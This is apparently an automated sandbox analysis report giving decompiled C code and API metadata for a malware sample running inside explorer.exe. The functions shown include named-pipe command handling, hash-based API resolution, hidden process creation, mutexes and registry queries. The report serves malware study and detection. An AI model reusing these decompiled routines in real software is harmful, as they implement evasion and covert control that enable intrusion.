        							_t112 = E000C93BE( &(_t86[4]), 0x20, 1,  &_v24);
        							_v40 = _t112;
        							if(_t112 != 0) {
        								_t114 = _v24;
        								if(_t114 <= 1) {
        									_t113 = 0;
        									_t54 = E000C1DA0(E000C9749( *_t112), 0, 0, 0);
        									_t115 = _t115 + 0x10;
        									_v172 = _t54;
        								} else {
        									_v36 = _t114 - 1;
        									_t83 = E000C8604(_t114 - 1 << 2);
        									_v32 = _t83;
        									if(_t83 == 0) {
        										_t113 = 0;
        									} else {
        										if(_t114 > 1) {
        											_v20 = _t83;
        											_t84 = 1;
        											do {
        												_t64 = E000C91A6( *((intOrPtr*)(_t112 + _t84 * 4)), E000CC379( *((intOrPtr*)(_t112 + _t84 * 4))));
        												_t97 = _v20;
        												_t84 = _t84 + 1;
        												 *_t97 = _t64;
        												_v20 = _t97 + 4;
        											} while (_t84 < _t114);
        											_t83 = _v32;
        										}
        										_t113 = 0;
        										_t61 = E000C1DA0(E000C9749( *_t112), _t83, _v36, 0);
        										_t115 = _t115 + 0x10;
        										_v172 = _t61;
        										E000C94B7( &_v24);
        									}
        									_t82 = _v12;
        								}
        							}
        							_t105 =  *0xde724; // 0x2680020
        							E000C96CA( &_v168,  &(_t105[4]), 0x80);
        							_push(0x84);
        							_push( &_v172);
        							_push(2);
        							goto L33;
        						} else {
        							_t65 = _t47 - 3;
        							if(_t65 == 0) {
        								_push(_t113);
        								_push(_t113);
        								_t108 = 5;
        								E000CC319(_t108);
        								 *0xde758 = 1;
        								_t82 = 1;
        								_v12 = 1;
        							} else {
        								_t68 = _t65;
        								if(_t68 == 0) {
        									_t70 = E000CF79F( &_v8);
        									goto L13;
        								} else {
        									_t72 = _t68 - 1;
        									if(_t72 == 0) {
        										E000CF79F( &_v8);
        										goto L16;
        									} else {
        										_t76 = _t72 - 1;
        										if(_t76 == 0) {
        											_t70 = E000CF7C1( &_v8);
        											L13:
        											if(_t70 == 0) {
        												_push(_t113);
        												_push(_t113);
        												_push(0xa);
        											} else {
        												_push(_v8);
        												_push(_t70);
        												_push(5);
        											}
        											_pop(_t109);
        											E000CC319(_t109);
        										} else {
        											if(_t76 == 1) {
        												E000CF7C1( &_v8);
        												L16:
        												_push(4);
        												_push( &_v8);
        												_push(5);
        												L33:
        												_pop(_t107);
        												E000CC319(_t107);
        												_t115 = _t115 + 0xc;
        											}
        										}
        									}
        								}
        							}
        						}
        					}
        					DisconnectNamedPipe( *0xde674);
        					if(_t82 == 0) {
        						continue;
        					}
        					break;
        				}
        				return 0;
        			}

        APIs
        • ConnectNamedPipe.KERNELBASE(00000000), ref: 000C32C6
        • GetLastError.KERNEL32 ref: 000C32D0
          • Part of subcall function 000CC319: FlushFileBuffers.KERNEL32(000001E4), ref: 000CC35F
        • DisconnectNamedPipe.KERNEL32 ref: 000C34B4
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
        • String ID:
        • API String ID: 2389948835-0
        • Opcode ID: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
        • Instruction ID: 58aa84d8eb2c3f5bebb521c1968008652298eb85fb782967e61da74a0d83595a
        • Opcode Fuzzy Hash: f186f2d00c7bfa6003295f32769de08b9a4e9688a4ea1a33c6e7d1db8d1624f1
        • Instruction Fuzzy Hash: EA512471A10205AFDB61EFA4DC89FEEBBB8EF05300F10812EF504A6152DB349B44CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 498 cb012-cb079 memset * 2 SHGetFolderPathW call cb946 501 cb07c-cb07e 498->501 502 cb0ab-cb0dd call cc392 lstrcpynW 501->502 503 cb080-cb094 call cbb8d 501->503 503->502 508 cb096-cb0a7 503->508 508->502
        C-Code - Quality: 87%
        			E000CB012(void* __ecx, WCHAR* __edx) {
        				int _v8;
        				void _v528;
        				char _v1046;
        				void _v1048;
        				intOrPtr _t21;
        				intOrPtr* _t26;
        				void* _t27;
        				intOrPtr _t33;
        				intOrPtr _t36;
        				void* _t39;
        				intOrPtr _t40;
        				WCHAR* _t47;
        				void* _t49;
        
        				_t39 = __ecx;
        				_v8 = 0x104;
        				_t47 = __edx;
        				memset( &_v1048, 0, 0x208);
        				memset( &_v528, 0, 0x208);
        				_t21 =  *0xde698; // 0x64fbc8
        				 *((intOrPtr*)(_t21 + 4))(0, 0x1a, 0, 1,  &_v1048);
        				_t49 = E000CB946(_t39);
        				_t26 =  *0xde6b8; // 0x64fbd8
        				_t27 =  *_t26(_t49,  &_v528,  &_v8); // executed
        				if(_t27 == 0) {
        					_t33 =  *0xde688; // 0xf0000
        					if(E000CBB8D( *((intOrPtr*)( *((intOrPtr*)(_t33 + 0x110))))) != 0) {
        						_t36 =  *0xde698; // 0x64fbc8
        						 *((intOrPtr*)(_t36 + 4))(0, 0x24, 0, 1,  &_v528);
        					}
        				}
        				_t40 =  *0xde684; // 0x64f8f0
        				 *((intOrPtr*)(_t40 + 0x30))(_t49);
        				lstrcpynW(_t47,  &_v1046 + E000CC392( &_v528) * 2, 0x104);
        				return 1;
        			}

        APIs
        • memset.MSVCRT ref: 000CB037
        • memset.MSVCRT ref: 000CB045
        • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000001,?,?,?,?,?,?,00000000), ref: 000CB05F
          • Part of subcall function 000CB946: GetCurrentThread.KERNEL32(00000008,00000000,10000000,00000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB959
          • Part of subcall function 000CB946: GetLastError.KERNEL32(?,?,000CBA7C,74EC17D9,10000000), ref: 000CB967
          • Part of subcall function 000CB946: GetCurrentProcess.KERNEL32(00000008,10000000,?,?,000CBA7C,74EC17D9,10000000), ref: 000CB980
        • lstrcpynW.KERNEL32(?,?,00000104,?,?,?,?,?,00000000), ref: 000CB0D0
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Currentmemset$ErrorFolderLastPathProcessThreadlstrcpyn
        • String ID:
        • API String ID: 3158470084-0
        • Opcode ID: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
        • Instruction ID: 51dd89181f6f65cfcdbed33b84d5b23baa4a46682fef0b4f5f6547b1bf5b27aa
        • Opcode Fuzzy Hash: cf666d5b425dfdb882d85405df432cbf1151db4e83984f2af2481bad33d39ac9
        • Instruction Fuzzy Hash: 8C2196B1501218AFE710EB94DCC5EDB37BCEB58354F1040A5F605D7192D7749E458B70
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 510 cbf37-cbf66 RegOpenKeyExW 511 cbf6c-cbf8a RegQueryValueExW 510->511 512 cbf68-cbf6a 510->512 514 cbf8c-cbf9c call c8604 511->514 515 cbfc7-cbfca 511->515 513 cbfda-cbfdc 512->513 514->515 521 cbf9e-cbfb8 RegQueryValueExW 514->521 517 cbfcc-cbfd1 515->517 518 cbfd7 515->518 517->518 520 cbfd9 518->520 520->513 522 cbfdd-cbfea RegCloseKey 521->522 523 cbfba-cbfc6 call c861a 521->523 522->520 523->515
        C-Code - Quality: 100%
        			E000CBF37(short* __edx, short* _a4) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				char* _v20;
        				char* _t30;
        				intOrPtr _t31;
        				char* _t49;
        
        				_v16 = 0;
        				_v12 = 0;
        				_v8 = 0;
        				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
        					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
        						L6:
        						if(_v8 != 0) {
        							_t31 =  *0xde68c; // 0x64fab8
        							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
        						}
        						_t30 = 0;
        						L9:
        						return _t30;
        					}
        					_t49 = E000C8604(_v12);
        					_v20 = _t49;
        					if(_t49 == 0) {
        						goto L6;
        					}
        					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
        						RegCloseKey(_v8);
        						_t30 = _t49;
        						goto L9;
        					}
        					E000C861A( &_v20, 0xfffffffe);
        					goto L6;
        				}
        				return 0;
        			}

        APIs
        • RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,00000000,00000000,?,?,000C2C08,00000000), ref: 000CBF5E
        • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,?,00000000,000C2C08,00000000,?,?,000C2C08,00000000), ref: 000CBF82
        • RegQueryValueExW.KERNEL32(00000000,000C2C08,00000000,00000000,00000000,000C2C08,?,?,000C2C08,00000000), ref: 000CBFB0
        • RegCloseKey.KERNEL32(00000000,?,?,000C2C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 000CBFE5
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
        • Instruction ID: 5287311d19161c5311007a090eb7e9ccf09f1a8ec080f3f080957cd4843ff4b4
        • Opcode Fuzzy Hash: 6ed20ac75d6ce2a2794a5c5300ff495a1a8a29f4fc73051a43656656db23271c
        • Instruction Fuzzy Hash: 9E210976900118FFDB10DFA5DC45E9EBBF8EF54740F1141AAB905E6261D7309A01DB60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 526 cbe9b-cbec3 RegOpenKeyExA 527 cbec9-cbee6 RegQueryValueExA 526->527 528 cbec5-cbec7 526->528 530 cbee8-cbef7 call c8604 527->530 531 cbf21-cbf24 527->531 529 cbf33-cbf36 528->529 530->531 536 cbef9-cbf13 RegQueryValueExA 530->536 533 cbf26-cbf2e RegCloseKey 531->533 534 cbf31 531->534 533->534 534->529 536->531 537 cbf15-cbf1a 536->537 537->531 538 cbf1c-cbf1f 537->538 538->531
        C-Code - Quality: 100%
        			E000CBE9B(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
        				void* _v8;
        				int _v12;
        				int _v16;
        				intOrPtr* _t43;
        				char* _t46;
        
        				_t46 = 0;
        				_v8 = 0;
        				_v16 = 0;
        				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
        					return 0;
        				}
        				_v12 = 0;
        				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
        					_t46 = E000C8604(_v12 + 1);
        					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
        						_t43 = _a12;
        						if(_t43 != 0) {
        							 *_t43 = _v12;
        						}
        					}
        				}
        				if(_v8 != 0) {
        					RegCloseKey(_v8);
        				}
        				return _t46;
        			}

        APIs
        • RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,0064FC18,00000000,?,00000002), ref: 000CBEBE
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBEE1
        • RegQueryValueExA.KERNEL32(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 000CBF0E
        • RegCloseKey.KERNEL32(?,?,00000002), ref: 000CBF2E
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: QueryValue$CloseOpen
        • String ID:
        • API String ID: 1586453840-0
        • Opcode ID: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
        • Instruction ID: 0a60d65e2cdd778546922eb2bef94615bab3b931e93d59a9e41fb967d6fdba14
        • Opcode Fuzzy Hash: d02e406de60bbb37e370e22bde6ecbd53870ad3f0dddb35dbfbb7c6fd1738d1e
        • Instruction Fuzzy Hash: 7221EAB5A01148BF9B60DFA9DC85EAEBBF8EF84740B0141AAB901D7220D730DA01DB61
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 78%
        			E000C5631(void* __edx, void* __edi) {
        				char _v44;
        				void* _t8;
        				intOrPtr _t11;
        				intOrPtr _t14;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				void* _t20;
        				void* _t33;
        				void* _t34;
        				void* _t36;
        				void* _t39;
        				void* _t40;
        				void* _t49;
        				void* _t54;
        
        				_t54 = __edi;
        				_t8 = E000C9E66(0x3b); // executed
        				if(_t8 != 0xffffffff) {
        					L2:
        					E000C980C(0xde6c8);
        					_t39 = 0x37; // executed
        					E000C9F06(_t39);
        					_t11 =  *0xde688; // 0xf0000
        					_t40 = 0x3a; // executed
        					E000C9F06(_t40); // executed
        					E000CE4C1(_t63);
        					_t14 =  *0xde688; // 0xf0000
        					_t41 =  &_v44;
        					_t52 =  *((intOrPtr*)(_t14 + 0xac)) + 2;
        					E000CA86D( &_v44,  *((intOrPtr*)(_t14 + 0xac)) + 2, _t63);
        					_t17 =  *0xde684; // 0x64f8f0
        					_t18 =  *((intOrPtr*)(_t17 + 0xc4))(0, 0, 0,  &_v44,  *((intOrPtr*)(_t11 + 0x1640)), 0,  *0xde6c8,  *0xde6cc);
        					 *0xde74c = _t18;
        					if(_t18 != 0) {
        						_t20 = CreateMutexA(0, 0, 0);
        						 *0xde76c = _t20;
        						__eflags = _t20;
        						if(_t20 != 0) {
        							_t34 = E000C8604(0x1000);
        							_t52 = 0;
        							 *0xde770 = _t34;
        							_t49 =  *0xde774; // 0x2
        							__eflags = _t34;
        							_t41 =  !=  ? 0 : _t49;
        							__eflags = _t41;
        							 *0xde774 = _t41; // executed
        						}
        						E000C153B(_t41, _t52); // executed
        						E000C98EE(E000C2EDA, 0, __eflags, 0, 0); // executed
        						E000C3017(); // executed
        						E000C31C2(0, __eflags); // executed
        						E000C29B1(); // executed
        						E000C3BB2(_t54, __eflags); // executed
        						while(1) {
        							__eflags =  *0xde758; // 0x0
        							if(__eflags != 0) {
        								break;
        							}
        							E000C980C(0xde750);
        							_push(0xde750);
        							_push(0xde750); // executed
        							E000C279B();
        							Sleep(0xfa0);
        						}
        						E000C3D34();
        						E000C9A8E();
        						E000C34CB();
        						_t33 = 0;
        						__eflags = 0;
        					} else {
        						goto L3;
        					}
        				} else {
        					_t36 = E000C2DCB();
        					_t63 = _t36;
        					if(_t36 != 0) {
        						L3:
        						_t33 = 1;
        					} else {
        						goto L2;
        					}
        				}
        				return _t33;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 000C56D0
          • Part of subcall function 000C980C: GetSystemTimeAsFileTime.KERNEL32(?,?,000C5FAF), ref: 000C9819
        • Sleep.KERNELBASE(00000FA0), ref: 000C574A
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Time$CreateFileMutexSleepSystem
        • String ID: cYNa
        • API String ID: 1795067453-1073062283
        • Opcode ID: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
        • Instruction ID: eac5d3ba3098b1c205fc506b64538c27d0fa099f414122062ecd2b130421744d
        • Opcode Fuzzy Hash: c27f45518239c0c3d62b17159f1cc2f7f946a0693ed706e96f3420fb85cb25ce
        • Instruction Fuzzy Hash: 3A31D4312066509BE764BB75EC4AFDE3B99DF15390B10412EF9098B1A3EE34D5408672
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 589 cdfad-cdfc4 590 cdfc6-cdfee 589->590 591 ce021 589->591 590->591 592 cdff0-ce013 call cc379 call cd400 590->592 593 ce023-ce027 591->593 598 ce028-ce03f 592->598 599 ce015-ce01f 592->599 600 ce095-ce097 598->600 601 ce041-ce049 598->601 599->591 599->592 600->593 601->600 602 ce04b 601->602 603 ce04d-ce053 602->603 604 ce055-ce057 603->604 605 ce063-ce074 603->605 604->605 606 ce059-ce061 604->606 607 ce079-ce085 LoadLibraryA 605->607 608 ce076-ce077 605->608 606->603 606->605 607->591 609 ce087-ce091 GetProcAddress 607->609 608->607 609->591 610 ce093 609->610 610->593
        C-Code - Quality: 100%
        			E000CDFAD(void* __ecx, intOrPtr __edx) {
        				signed int _v8;
        				intOrPtr _v12;
        				intOrPtr _v16;
        				intOrPtr _v20;
        				intOrPtr _v24;
        				intOrPtr _v28;
        				char _v92;
        				intOrPtr _t41;
        				signed int _t47;
        				signed int _t49;
        				signed int _t51;
        				void* _t56;
        				struct HINSTANCE__* _t58;
        				_Unknown_base(*)()* _t59;
        				intOrPtr _t60;
        				void* _t62;
        				intOrPtr _t63;
        				void* _t69;
        				char _t70;
        				void* _t75;
        				CHAR* _t80;
        				void* _t82;
        
        				_t75 = __ecx;
        				_v12 = __edx;
        				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
        				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
        				if(_t41 == 0) {
        					L4:
        					return 0;
        				}
        				_t62 = _t41 + __ecx;
        				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
        				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_t63 =  *((intOrPtr*)(_t62 + 0x18));
        				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
        				_t47 = 0;
        				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
        				_v8 = 0;
        				_v16 = _t63;
        				if(_t63 == 0) {
        					goto L4;
        				} else {
        					goto L2;
        				}
        				while(1) {
        					L2:
        					_t49 = E000CD400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E000CC379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
        					_t51 = _v8;
        					if((_t49 ^ 0x218fe95b) == _v12) {
        						break;
        					}
        					_t73 = _v20;
        					_t47 = _t51 + 1;
        					_v8 = _t47;
        					if(_t47 < _v16) {
        						continue;
        					}
        					goto L4;
        				}
        				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
        				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
        				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
        					return _t80;
        				} else {
        					_t56 = 0;
        					while(1) {
        						_t70 = _t80[_t56];
        						if(_t70 == 0x2e || _t70 == 0) {
        							break;
        						}
        						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
        						_t56 = _t56 + 1;
        						if(_t56 < 0x40) {
        							continue;
        						}
        						break;
        					}
        					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
        					 *((char*)(_t82 + _t56 - 0x54)) = 0;
        					if( *((char*)(_t56 + _t80)) != 0) {
        						_t80 =  &(( &(_t80[1]))[_t56]);
        					}
        					_t40 =  &_v92; // 0x6c6c642e
        					_t58 = LoadLibraryA(_t40); // executed
        					if(_t58 == 0) {
        						goto L4;
        					}
        					_t59 = GetProcAddress(_t58, _t80);
        					if(_t59 == 0) {
        						goto L4;
        					}
        					return _t59;
        				}
        			}

        APIs
        • LoadLibraryA.KERNEL32(.dll), ref: 000CE07D
        • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 000CE089
        Strings
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AddressLibraryLoadProc
        • String ID: .dll
        • API String ID: 2574300362-2738580789
        • Opcode ID: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction ID: 5f9d211447d3819fd503f87bdcf7e534d45c92374d2040a9589af20f045a33b0
        • Opcode Fuzzy Hash: 73480dcf04640b5668e538ebe0794b7acac3a1320454cbe5ad927de6f1f71708
        • Instruction Fuzzy Hash: 6D31B231A001959BDB64CFA9C884BAEBBE5AF44304F38446ED905D7352DA74ED81CBE0
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 611 ca911-ca941 memset 612 ca94c-ca971 CreateProcessW 611->612 613 ca943-ca948 611->613 614 ca9ae 612->614 615 ca973-ca976 612->615 613->612 618 ca9b0-ca9b6 614->618 616 ca978-ca988 615->616 617 ca996-ca9ac 615->617 616->617 621 ca98a-ca990 GetExitCodeProcess 616->621 617->618 621->617
        C-Code - Quality: 66%
        			E000CA911(WCHAR* _a4, DWORD* _a8, intOrPtr _a12, signed int _a16) {
        				struct _PROCESS_INFORMATION _v20;
        				struct _STARTUPINFOW _v92;
        				signed int _t24;
        				intOrPtr _t30;
        				intOrPtr _t32;
        				intOrPtr _t34;
        				int _t42;
        				WCHAR* _t44;
        
        				_t42 = 0x44;
        				memset( &_v92, 0, _t42);
        				_v92.cb = _t42;
        				asm("stosd");
        				_t44 = 1;
        				asm("stosd");
        				asm("stosd");
        				asm("stosd");
        				_t24 = _a16;
        				if(_t24 != 0) {
        					_v92.dwFlags = 1;
        					_v92.wShowWindow = 0;
        				}
        				asm("sbb eax, eax");
        				if(CreateProcessW(0, _a4, 0, 0, 0,  ~_t24 & 0x08000000, 0, 0,  &_v92,  &_v20) == 0) {
        					_t44 = 0;
        				} else {
        					if(_a8 != 0) {
        						_push(_a12);
        						_t34 =  *0xde684; // 0x64f8f0
        						_push(_v20.hProcess);
        						if( *((intOrPtr*)(_t34 + 0x2c))() >= 0) {
        							GetExitCodeProcess(_v20.hProcess, _a8);
        						}
        					}
        					_t30 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t30 + 0x30))(_v20.hThread);
        					_t32 =  *0xde684; // 0x64f8f0
        					 *((intOrPtr*)(_t32 + 0x30))(_v20);
        				}
        				return _t44;
        			}

        APIs
        • memset.MSVCRT ref: 000CA925
        • CreateProcessW.KERNEL32(00000000,00001388,00000000,00000000,00000000,000CC1AB,00000000,00000000,?,00000000,00000000,00000000,00000001), ref: 000CA96C
        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 000CA990
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Process$CodeCreateExitmemset
        • String ID:
        • API String ID: 4170947310-0
        • Opcode ID: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
        • Instruction ID: ad8e7d9e7c99006ac07fdead5766fa5e04d5cfaaf349d8d5b7d3a67e274f57a9
        • Opcode Fuzzy Hash: 515fd2f31e6901e20d6c51561e52fb1df9f2721549949078c0095c01d271d124
        • Instruction Fuzzy Hash: 4F210E71A10119BFEB519FA9DC85EAE7BBCEB18784B01441AFA15D6161D634DC008B61
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 86%
        			E000CB998(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
        				long _v8;
        				void* _v12;
        				void* _t12;
        				void* _t20;
        				void* _t22;
        				union _TOKEN_INFORMATION_CLASS _t28;
        				void* _t31;
        
        				_push(_t22);
        				_push(_t22);
        				_t31 = 0;
        				_t28 = __edx;
        				_t20 = _t22;
        				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
        					L6:
        					_t12 = _t31;
        				} else {
        					_t31 = E000C8604(_v8);
        					_v12 = _t31;
        					if(_t31 != 0) {
        						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
        							goto L6;
        						} else {
        							E000C861A( &_v12, _t16);
        							goto L3;
        						}
        					} else {
        						L3:
        						_t12 = 0;
        					}
        				}
        				return _t12;
        			}

        APIs
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,74EC17D9,00000000,10000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9B3
        • GetLastError.KERNEL32(?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9BA
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,000CBA37,?,00000000,?,000CD0A8), ref: 000CB9E9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: InformationToken$AllocateErrorHeapLast
        • String ID:
        • API String ID: 2499131667-0
        • Opcode ID: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
        • Instruction ID: d997e41f721a916132a1fdbd49b54382bda47c6799cd78954eaa02ec7e04328f
        • Opcode Fuzzy Hash: e9155d94487f8a68c3b89b0e28b4ce959b8024583ace24d3e3980001a81adf0b
        • Instruction Fuzzy Hash: A501A272601118BF9B209BA6DC4AEAF7FECDB457A1B10022AFA05D7111EB30DD0087B0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000C590C(CHAR* __ecx, void* __edx, intOrPtr* _a4) {
        				intOrPtr _t10;
        				void* _t13;
        				void* _t19;
        				signed int _t21;
        				signed int _t22;
        
        				_t13 = __edx;
        				if(__ecx != 0) {
        					_t22 = 0;
        					_t19 = CreateMutexA(0, 1, __ecx);
        					if(_t19 != 0) {
        						if(GetLastError() != 0xb7 || E000CA4BF(_t19, _t13) != 0xffffffff) {
        							_t22 = 1;
        							 *_a4 = _t19;
        						} else {
        							_t10 =  *0xde684; // 0x64f8f0
        							 *((intOrPtr*)(_t10 + 0x30))(_t19);
        						}
        					} else {
        						GetLastError();
        						_t22 = 0xffffffff;
        					}
        				} else {
        					_t22 = _t21 | 0xffffffff;
        				}
        				return _t22;
        			}

        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,00000000,?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5928
        • GetLastError.KERNEL32(?,?,000C59CD,000C5DD4,Global,000DBA18,?,00000000,?,00000002), ref: 000C5934
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateErrorLastMutex
        • String ID:
        • API String ID: 1925916568-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E000CA471(CHAR* __ecx, void* __edx) {
        				intOrPtr _t8;
        				void* _t16;
        				void* _t17;
        
        				_t16 = __edx; // executed
        				_t17 = CreateMutexA(0, 1, __ecx);
        				if(_t17 != 0) {
        					if(GetLastError() == 0xb7 && E000CA4BF(_t17, _t16) < 0) {
        						_t8 =  *0xde684; // 0x64f8f0
        						 *((intOrPtr*)(_t8 + 0x30))(_t17);
        						_t17 = 0;
        					}
        					return _t17;
        				}
        				GetLastError();
        				return 0;
        			}







        APIs
        • CreateMutexA.KERNELBASE(00000000,00000001,?,00000000,00000000,000C4E14,00000000), ref: 000CA47F
        • GetLastError.KERNEL32 ref: 000CA48B
        • GetLastError.KERNEL32 ref: 000CA495
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: ErrorLast$CreateMutex
        • String ID:
        • API String ID: 200418032-0
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E000C6DA0(void* __eflags, void* __fp0) {
        				short _v536;
        				WCHAR* _v544;
        				WCHAR* _t9;
        				intOrPtr _t10;
        				intOrPtr _t11;
        				void* _t22;
        				void* _t32;
        				intOrPtr _t34;
        				intOrPtr _t35;
        				intOrPtr _t41;
        				intOrPtr _t43;
        				intOrPtr _t46;
        				intOrPtr _t49;
        				void* _t51;
        				void* _t53;
        				void* _t56;
        				WCHAR* _t59;
        				signed int _t60;
        				void* _t62;
        				void* _t63;
        				void* _t74;
        
        				_t74 = __fp0;
        				_t34 =  *0xde778; // 0x64fc18
        				_t62 = (_t60 & 0xfffffff8) - 0x21c;
        				_t51 = 0x31;
        				_t32 = 1; // executed
        				_t9 = E000C9ED0(_t34, _t51); // executed
        				if(_t9 != 0) {
        					_t10 =  *0xde78c; // 0x0
        					_t66 = _t10;
        					if(_t10 == 0) {
        						_t49 =  *0xde688; // 0xf0000
        						_t10 = E000CEDCF(_t49 + 0xb0, _t51, _t66);
        						 *0xde78c = _t10;
        					}
        					_push(0);
        					_push(_t10);
        					_t11 =  *0xde688; // 0xf0000
        					_push(L"\\c");
